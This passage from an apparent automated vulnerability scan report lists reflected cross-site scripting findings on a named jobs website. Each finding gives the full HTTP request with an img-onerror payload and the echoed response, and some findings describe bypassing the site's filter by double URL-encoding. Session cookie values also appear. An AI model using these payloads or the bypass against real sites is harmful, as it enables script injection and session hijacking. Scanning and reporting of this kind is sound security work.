Date: Fri, 22 Apr 2011 16:38:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:38:47 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites9369b"><img src=a onerror=alert(1)>60bd3b3e611-all-themes-threesixty-js-easyTooltip.js not-front not-logged-in page-sites9369bimg-srca-onerroralert160bd3b3e611 no-sidebars">
...[SNIP]...

3.130. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/easyTooltip.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7318"><img%20src%3da%20onerror%3dalert(1)>5390e89c2cb was submitted in the REST URL parameter 2. This input was echoed as b7318"><img src=a onerror=alert(1)>5390e89c2cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/allb7318"><img%20src%3da%20onerror%3dalert(1)>5390e89c2cb/themes/threesixty/js/easyTooltip.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:40:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:40:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-allb7318"><img src=a onerror=alert(1)>5390e89c2cb-themes-threesixty-js-easyTooltip.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.131. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/easyTooltip.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29e37"><img%20src%3da%20onerror%3dalert(1)>1d222c0ec3b was submitted in the REST URL parameter 3. This input was echoed as 29e37"><img src=a onerror=alert(1)>1d222c0ec3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes29e37"><img%20src%3da%20onerror%3dalert(1)>1d222c0ec3b/threesixty/js/easyTooltip.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:42:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:42:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes29e37"><img src=a onerror=alert(1)>1d222c0ec3b-threesixty-js-easyTooltip.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.132. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/easyTooltip.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76b3d"><img%20src%3da%20onerror%3dalert(1)>924cd6c50ba was submitted in the REST URL parameter 4. This input was echoed as 76b3d"><img src=a onerror=alert(1)>924cd6c50ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sites/all/themes/threesixty76b3d"><img%20src%3da%20onerror%3dalert(1)>924cd6c50ba/js/easyTooltip.js?L HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: jobs.ctg.eu

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 17:12:49 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS5fce01b171785c9633d86359009a9819=ddb1412a573261f6625b612601e0723c; expires=Sun, 15-May-2011 20:46:10 GMT; path=/; domain=.jobs.ctg.eu
Last-Modified: Fri, 22 Apr 2011 17:12:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty76b3d"><img src=a onerror=alert(1)>924cd6c50ba-js-easyTooltip.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.133. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/easyTooltip.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56a7c"><img%20src%3da%20onerror%3dalert(1)>eda61fe431e was submitted in the REST URL parameter 4. This input was echoed as 56a7c"><img src=a onerror=alert(1)>eda61fe431e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty56a7c"><img%20src%3da%20onerror%3dalert(1)>eda61fe431e/js/easyTooltip.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:44:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:44:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty56a7c"><img src=a onerror=alert(1)>eda61fe431e-js-easyTooltip.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.134. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/easyTooltip.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80264"><img%20src%3da%20onerror%3dalert(1)>f6f1a8b106 was submitted in the REST URL parameter 5. This input was echoed as 80264"><img src=a onerror=alert(1)>f6f1a8b106 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/js80264"><img%20src%3da%20onerror%3dalert(1)>f6f1a8b106/easyTooltip.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:45:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:45:10 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-js80264"><img src=a onerror=alert(1)>f6f1a8b106-easyTooltip.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.135. http://jobs.ctg.eu/sites/all/themes/threesixty/js/easyTooltip.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/easyTooltip.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb57e"><img%20src%3da%20onerror%3dalert(1)>5c57ffbac9c was submitted in the REST URL parameter 6. This input was echoed as cb57e"><img src=a onerror=alert(1)>5c57ffbac9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/js/easyTooltip.jscb57e"><img%20src%3da%20onerror%3dalert(1)>5c57ffbac9c?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:46:17 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:46:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-js-easyTooltip.jscb57e"><img src=a onerror=alert(1)>5c57ffbac9c not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.136. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/effects.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55d6e"><img%20src%3da%20onerror%3dalert(1)>17021c34628 was submitted in the REST URL parameter 1. This input was echoed as 55d6e"><img src=a onerror=alert(1)>17021c34628 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites55d6e"><img%20src%3da%20onerror%3dalert(1)>17021c34628/all/themes/threesixty/js/effects.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:34:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:34:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites55d6e"><img src=a onerror=alert(1)>17021c34628-all-themes-threesixty-js-effects.js not-front not-logged-in page-sites55d6eimg-srca-onerroralert117021c34628 no-sidebars">
...[SNIP]...

3.137. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/effects.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94d19"><img%20src%3da%20onerror%3dalert(1)>638294a4b77 was submitted in the REST URL parameter 2. This input was echoed as 94d19"><img src=a onerror=alert(1)>638294a4b77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all94d19"><img%20src%3da%20onerror%3dalert(1)>638294a4b77/themes/threesixty/js/effects.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:36:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:36:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all94d19"><img src=a onerror=alert(1)>638294a4b77-themes-threesixty-js-effects.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.138. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/effects.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f881"><img%20src%3da%20onerror%3dalert(1)>4e2f24ccbfa was submitted in the REST URL parameter 3. This input was echoed as 1f881"><img src=a onerror=alert(1)>4e2f24ccbfa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes1f881"><img%20src%3da%20onerror%3dalert(1)>4e2f24ccbfa/threesixty/js/effects.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:37:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:37:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes1f881"><img src=a onerror=alert(1)>4e2f24ccbfa-threesixty-js-effects.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.139. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/effects.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f30d"><img%20src%3da%20onerror%3dalert(1)>db1815b09dc was submitted in the REST URL parameter 4. This input was echoed as 2f30d"><img src=a onerror=alert(1)>db1815b09dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty2f30d"><img%20src%3da%20onerror%3dalert(1)>db1815b09dc/js/effects.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:39:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:39:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty2f30d"><img src=a onerror=alert(1)>db1815b09dc-js-effects.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.140. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/effects.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4930d"><img%20src%3da%20onerror%3dalert(1)>04f9905d679 was submitted in the REST URL parameter 4. This input was echoed as 4930d"><img src=a onerror=alert(1)>04f9905d679 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sites/all/themes/threesixty4930d"><img%20src%3da%20onerror%3dalert(1)>04f9905d679/js/effects.js?L HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: jobs.ctg.eu

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 17:12:52 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS5fce01b171785c9633d86359009a9819=60949fc6a526b58054e62d243c4d082a; expires=Sun, 15-May-2011 20:46:13 GMT; path=/; domain=.jobs.ctg.eu
Last-Modified: Fri, 22 Apr 2011 17:12:54 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty4930d"><img src=a onerror=alert(1)>04f9905d679-js-effects.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.141. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/effects.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9c7a"><img%20src%3da%20onerror%3dalert(1)>e4699464745 was submitted in the REST URL parameter 5. This input was echoed as f9c7a"><img src=a onerror=alert(1)>e4699464745 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/jsf9c7a"><img%20src%3da%20onerror%3dalert(1)>e4699464745/effects.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:41:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:41:32 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-jsf9c7a"><img src=a onerror=alert(1)>e4699464745-effects.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.142. http://jobs.ctg.eu/sites/all/themes/threesixty/js/effects.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/js/effects.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f89d3"><img%20src%3da%20onerror%3dalert(1)>87598a82479 was submitted in the REST URL parameter 5. This input was echoed as f89d3"><img src=a onerror=alert(1)>87598a82479 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sites/all/themes/threesixty/jsf89d3"><img%20src%3da%20onerror%3dalert(1)>87598a82479/effects.js?L HTTP/1.1
Accept: */*
